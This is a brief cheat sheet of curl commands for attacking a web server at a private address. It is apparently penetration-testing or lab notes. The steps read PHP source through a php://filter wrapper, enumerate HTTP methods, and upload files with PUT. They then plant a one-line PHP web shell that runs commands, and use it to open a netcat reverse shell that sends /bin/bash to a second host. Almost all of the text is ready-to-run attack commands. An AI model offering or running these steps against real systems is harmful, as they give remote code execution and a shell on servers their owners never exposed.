Curl Commands

Get base64 encoding back for an HTML page:

  • curl http://10.0.0.31/?page=php://filter/convert.base64-encode/resource=upload

Check Page Header:

  • curl -k -I http://10.0.0.31

Enumerate HTTP methods (we want to find PUT method):

  • curl -v -X OPTIONS http://10.0.0.31

Place File (Requires PUT method):

  • curl -v -X PUT -d “Testing 1 2 3” http://10.0.0.31/blog/wp-admin/index.php

Place PHP Shell File(Requires PUT Method):

  • curl -v -X PUT -d ‘<?php system($_GET[“cmd”]); ?>’ http://10.0.0.31/shell.php

Use PHP shell to issue ‘which nc’ command to determine if netcat is installed and php shell functioning:

  • curl “http://10.0.0.31/test/cmd.php?cmd=which%20nc”

Establish a stable shell with netcat using the PHP shell:

  • curl “http://10.0.0.31/test/cmd.php?cmd=nc+10.0.0.25+443+-e+%2Fbin%2Fbash”